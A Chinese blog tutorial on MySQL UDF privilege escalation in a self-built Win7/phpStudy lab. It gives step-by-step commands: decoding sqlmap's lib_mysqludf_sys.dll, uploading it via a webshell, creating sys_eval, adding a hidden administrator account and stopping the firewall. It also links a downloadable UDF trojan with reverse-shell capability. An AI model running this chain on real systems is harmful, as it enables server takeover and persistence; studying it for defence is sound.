UDF提权

今天的这篇博客是mysql提权中的一种。

0x00 环境与前提

1. 本机搭建win7专业版虚拟环境
2. phpStudy 2018最新版本 
3. 运行的版本是php-5.4.45-nts + IIS
4. mysql版本Ver 14.14 Distrib 5.5.53，for Win32 （AMD64）
5. win7 phpstudy中搭建帝国CMS，并拿到该网站的webshell

环境搭建链接：这个文章还没有写先占个坑

0x01 UDF函数简介

UDF(user-defined function)是MySQL的一个拓展接口，也可称之为用户自定义函数，它是用来拓展MySQL的技术手段，可以说是数据库功能的一种扩展，用户通过自定义函数来实现在MySQL中无法方便实现的功能，其添加的新函数都可以在SQL语句中调用，就像本机函数如ABS()或SOUNDEX()一样方便。UDF官方介绍以及其函数定义请参考（http://dev.mysql.com/doc/refman/5.5/en/adding-functions.html、https://dev.mysql.com/doc/refman/5.5/en/create-function-udf.html），除了常见的UDF提权外，其实Udf还有更多更广泛的应用，例如https://github.com/mysqludf/repositories，就提供了非常多的应用：

lib_mysqludf_fPROJ4：一组扩展的科学函数，将地理经度和纬度坐标转换为笛卡尔坐标，反之亦然。
lib_mysqludf_json：用于将关系数据映射到JSON格式的函数的UDF库。
lib_mysqludf_log：用于将调试信息写入日志文件的UDF库。
lib_mysqludf_preg：直接在MySQL中使用PCRE正则表达式
lib_mysqludf_stat：用于统计分析的UDF库。
lib_mysqludf_str：一个带有MySQL附加字符串函数的UDF库
lib_mysqludf_sys：具有与操作系统交互的功能的UDF库。这些函数允许您与MySQL运行的执行环境进行交互。
lib_mysqludf_xml：一个UDF库，用于直接从MySQL创建XML输出。

0x02 提权条件

(1)Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。

(2)Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32，在windows2000下放置于c:\winnt\system32。

(3)掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数，一般以root账号为佳，具备root账号所具备的权限的其它账号也可以。这里允许root账户外连，（grant all PRIVILEGES on *.* to 'root'@'192.168.189.1' identified by '112358'; #这条命令就能让root用户指定ip连接）

(4)可以将udf.dll写入到相应目录的权限。

0x03 上传UDF

如果是mysql5.1及以上版本，必须要把udf.dll文件放到mysql安装目录的lib\plugin文件夹下才能创建自定义函数。该目录默认是不存在的，需要使用webshell找到mysql的安装目录，并在安装目录下创建lib\plugin文件夹，然后将udf.dll文件导出到该目录。

udf.dll这个文件不容易找到的（譬如我），后来才知道原来sqlmap里是有udf.dll文件的，就在sqlmap/udf/mysql/目录下，里面有windows和linux，选择windows，里面有32位和64位。

注意：

这里的位数是mysql的位数，并不是对方系统的位数。
sqlmap里的udf.dll是通过异或编码的，使用之前一定要记得解码，解码的工具也在sqlmap中，在sqlmap/extra/cloak目录下的cloak.py就是。

解密UDF

python cloak.py -d -i E:\Python27\sqlmap\udf\mysql\windows\32\lib_mysqludf_sys.dll_
python cloak.py -d -i E:\Python27\sqlmap\udf\mysql\windows\64\lib_mysqludf_sys.dll_

解密之后会在当前目录下生成dll文件

利用中国蚁剑先在靶机C:\phpStudy\PHPTutorial\MySQL\lib目录下创建plugin文件夹，再将32位的lib_mysqludf_sys.dll文件上传到plugin目录下。

0x04 提权步骤

1. 本机连接win7的mysql

不知道为什么中国蚁剑和菜刀都连接不上mysql，只能在本地dos命令框中连接了，本地的navicat也能连接。

[外链图片转存失败(img-rlTvnpmS-1563874861717)(https://i.loli.net/2019/07/22/5d3587c8e47f530995.png)]

连接后，创建cmdshell函数发现结果报错了，这里需要注意的是，需要创建lib_mysqludf_sys.dll中存在的函数才可以，可以用十六进制编辑器打开lib_mysqludf_sys.dll，可以看到有如下这些函数可以创建

lib_mysqludf_sys.dll lib_mysqludf_sys_info lib_mysqludf_sys_info_deinit lib_mysqludf_sys_info_init sys_bineval 
sys_bineval_deinit sys_bineval_init sys_eval sys_eval_deinit sys_eval_init sys_exec sys_exec_deinit 
sys_exec_init sys_get sys_get_deinit sys_get_i sys_set_deinit sys_set_init

2. 用到的语句

select name from mysql.func  #查看创建函数
select sys_eval('cmd','whoami') 
create function sys_eval returns string soname 'lib_mysqludf_sys.dll'  #创建函数
select sys_eval('net user zth 123456 /add & net localgroup administrators zth /add')   #创建用户zth密码123456并添加超级管理员
select sys_eval('net user') #查看用户
select sys_eval('netstat -an') #查看端口
select sys_eval('net stop sharedacess')  #停止防火墙
delete from mysql.func where name='sys_eval'  #删除函数
select sys_eval('netstat -an') into outfile 'C:\\phpStudy\\PHPTutorial\\MySQL\\lib\\plugin\\test.txt'; #保存结果到test.txt文件中

第一次创建函数的时，创建的是sys_exec这个函数，可是这个函数在执行一些语句时，执行结果在另一个命令框中一闪而过，如果想要保留查询结果的话，就需要用到以下语句，然后通过中国蚁剑下载test.txt到本机。sys_exec () can run a python program

select sys_eval('命令') into outfile '路径\\test.txt'; #保存结果到test.txt文件中

然而，在用sys_eval函数执行时，却能很好的返回信息。

不过这两个函数，都能执行提权的语句。

3. 执行提权语句

可以看到用户aaa已经是管理员权限，查询bbb用户也是管理员权限，不再截图。

0x05 通过蚁剑上传UDF木马

上传木马时，phpstudy切换的版本是php-5.4.45 + Apache

在版本php-5.4.45-nts + IIS 中，UDF木马运行不起来，有报错。

通过蚁剑上传UDF木马到/WWW/upload/e/admin目录下（这个木马是暗月大佬写的）

1.在火狐浏览器上访问登录

2.里面有自带的一些命令，用户也可以自己写明令，然后点击执行即可。

3.这里创建cmdshell函数，有回显语句的提示

4.提交添加超级管理员命令。执行成功。提权成功

当然这个木马还有反弹shell功能。下面也有一些命令的提示

sqlmap里的udf（windows下）和解码后的udf文件，以及暗月大佬的UDF木马链接：
链接：https://pan.baidu.com/s/1c-lv5pEnx64bOTGecFeVCw
提取码：w9bp

参考：
https://www.bilibili.com/video/av41942769/?p=26

https://blog.csdn.net/m0_37438418/article/details/80289025

https://www.jianshu.com/p/5b34c1b6dee7